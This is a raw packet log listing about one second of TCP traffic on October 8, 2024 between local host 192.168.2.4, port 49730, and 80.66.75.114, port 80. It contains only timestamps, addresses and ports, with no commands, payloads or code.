                                                            Oct 8, 2024 10:08:42.638303995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638319969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638345003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638345003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638364077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638536930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638550043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638576031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638587952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638590097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638605118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638605118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638621092 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638623953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638648033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638648033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638679028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638732910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638746977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638770103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638784885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638784885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638825893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638825893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.638984919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.638999939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.639040947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687068939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687083960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687098980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687180996 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687180996 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687545061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687561035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687576056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687608004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687644005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687654972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687668085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.687720060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.687720060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774244070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774264097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774281025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774346113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774360895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774375916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774383068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774391890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774383068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774383068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774483919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774483919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774483919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774669886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774683952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774698973 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774713993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774722099 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774729967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774745941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774750948 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774750948 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774761915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774775028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774779081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774790049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774795055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774810076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774811029 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774827957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.774830103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774830103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774852037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.774877071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776093960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776108980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776124001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776138067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776153088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776154041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776168108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776174068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776184082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776196003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776201010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.776212931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776232004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.776249886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.821826935 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.821964979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822000980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822101116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822101116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822101116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822604895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822633982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822693110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822726965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822760105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822793007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.822799921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822799921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822799921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822799921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822799921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.822904110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912137985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912229061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912257910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912266016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912301064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912329912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912329912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912336111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912358999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912369967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912379980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912406921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.912421942 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.912458897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.925858974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.925894022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.925929070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.925940037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.925961971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.925971031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.925971031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926014900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926018953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926053047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926070929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926086903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926100969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926120043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926137924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926153898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926167011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926187992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926203966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926220894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926237106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926255941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926270962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926290035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926307917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926323891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.926337004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.926373005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.928078890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.928112984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.928137064 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.928148031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.928160906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.928195953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.928221941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.928256035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.928275108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.928307056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.962219000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.962366104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.962371111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.962425947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.962428093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.962481022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.963061094 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.963097095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.963125944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.963156939 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.963407993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.963440895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.963469028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.963475943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.963486910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.963526011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053061008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053112984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053162098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053188086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053188086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053219080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053255081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053263903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053263903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053288937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053311110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053323030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053338051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053356886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053371906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053391933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053406954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053426027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053448915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053459883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053467989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053494930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053504944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053529024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053554058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053580046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053580046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053618908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053637981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053651094 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053663969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053684950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053699970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053719997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053738117 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053755045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053766012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053788900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053806067 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053824902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053841114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053873062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.053962946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.053997993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.054013968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.054030895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.054043055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.054066896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.054086924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.054119110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.102816105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.103015900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.103178024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.103246927 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234724045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234777927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234812975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234847069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234882116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234915972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234950066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234987020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235047102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235054016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235054970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235080957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235115051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235116959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235141039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235148907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235161066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235182047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235202074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235225916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235234976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235270977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235289097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235305071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235316038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235338926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235353947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235394955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235425949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235461950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235476017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235496044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235507011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235528946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235543966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235562086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235579014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235595942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235609055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235630035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235642910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235663891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235677004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235698938 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235709906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235749960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235757113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235790014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235811949 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235822916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235833883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235856056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235872984 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235891104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235908985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235924959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235938072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235959053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235975981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235995054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236007929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236028910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236044884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236061096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236080885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236109018 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236113071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236148119 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236165047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236181974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236196041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236231089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318005085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318065882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318070889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318101883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318119049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318136930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318156958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318170071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318187952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318243027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318259001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318275928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318303108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318310976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318320990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318345070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318361044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318380117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318397045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318423986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318430901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318459034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318478107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318492889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318506956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318528891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318538904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318574905 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365252972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365304947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365341902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365350008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365350962 CEST4973080192.168.2.480.66.75.114
